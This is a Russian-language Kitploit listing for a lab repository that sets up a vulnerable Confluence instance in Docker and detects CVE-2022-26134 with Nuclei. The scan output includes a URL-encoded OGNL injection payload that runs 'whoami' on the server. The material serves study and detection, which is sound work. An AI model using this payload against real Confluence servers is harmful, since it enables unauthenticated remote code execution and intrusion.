Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-26134-LAB — Обнаружение CVE-2022-26134 с помощью Nuclei | Kitploit
Инструменты/GitHubGitHub/skhalsa-sigsci/cve-2022-26134-lab
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubskhalsa-sigsci/cve-2022-26134-lab

CVE-2022-26134-LAB

Обнаружение CVE-2022-26134 с помощью Nuclei

Репозиторий
313 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-26134-LAB

Confluence Server и Confluence Data Center содержат критическую неаутентифицированную уязвимость удаленного выполнения кода, идентифицированную как CVE-2022-26134, согласно сообщению службы безопасности Atlassian от 2 июня 2022 года. Уязвимость не была исправлена на момент публикации 2 июня и активно эксплуатировалась в реальных условиях. По состоянию на 3 июня стали доступны как исправления, так и временное решение.

Этот репозиторий предназначен только для экспериментальных и образовательных целей.

Зависимости

  • Docker
  • Nuclei

Уязвимая среда Confluence

Запуск уязвимой среды

root@kitploit:~
docker-compose up

После запуска вы можете получить доступ к серверу Confluence по следующему URL-адресу:

http://127.0.0.1:8090/

Настройка сервера Confluence

  1. При первом посещении сайта вы пройдете через настройку.
  2. Не устанавливайте никакие флажки и нажмите «Далее» на странице «Получить приложения».
  3. На странице лицензионного ключа нажмите на ссылку «Получить ознакомительную лицензию».
  4. Вы будете перенаправлены на . Убедитесь, что выбран тип лицензии Confluence (Data Center). Введите любое название организации. Убедитесь, что переключатель «Ваш экземпляр» установлен в положение «работает». После проверки этих деталей нажмите кнопку «Сгенерировать лицензию».
my.atlassian.com
  • Появится модальное окно подтверждения с вопросом, хотите ли вы установить лицензию на сервер: 127.0.0.1. Выберите «Да».
  • Выбор «Да» автоматически заполнит лицензионный ключ на вашем локальном экземпляре Confluence. Нажмите «Далее».
  • Выберите тип развертывания «Автономный» и нажмите «Далее».
  • На странице настройки базы данных детали должны быть заполнены следующим образом:
    • Тип базы данных: PostgreSQL
    • Тип установки: Простой
    • Имя хоста: db
    • Порт: 5432
    • Имя базы данных: confluence
    • Имя пользователя: confluence
    • Пароль: 123456789
  • После заполнения этих полей нажмите кнопку «Проверить соединение». Вы должны получить сообщение «Успешно! База данных подключена успешно». Затем нажмите «Далее».
  • Начнется настройка базы данных. Это может занять некоторое время. Подождите.
  • После завершения настройки базы данных вы попадете на страницу «Загрузка контента». Нажмите кнопку «Пример сайта».
  • Затем на странице «Настройка управления пользователями» выберите «Управление пользователями и группами с помощью Confluence».
  • Далее на странице «Настройка учетной записи системного администратора» создайте учетную запись и нажмите «Далее».
  • После завершения вы увидите, что настройка прошла успешно. Нажмите «Начать».
  • Вас попросят «Создать пространство для хранения ваших материалов». Введите любое название пространства.
  • Пропустите обучение.
  • Теперь вы завершили ознакомительную настройку сервера Confluence.
  • Обнаружение CVE-2022-26134

    Уязвимость представляет собой внедрение OGNL, затрагивающее HTTP-сервер. Полезная нагрузка OGNL помещается в URI HTTP-запроса. Похоже, что работает любой тип HTTP-метода: как корректный (GET, POST, PUT и т. д.), так и некорректный (например, «BALH»).

    https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis

    Использование Nuclei

    Выполните следующую команду Nuclei:

    root@kitploit:~
    nuclei -u http://127.0.0.1:8090 -t nuclei-templates/cves/2022/CVE-2022-26134.yaml
    

    Результат сканирования

    root@kitploit:~
    [CVE-2022-26134] [http] [critical] http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ [confluence]
    
    Скачать инструмент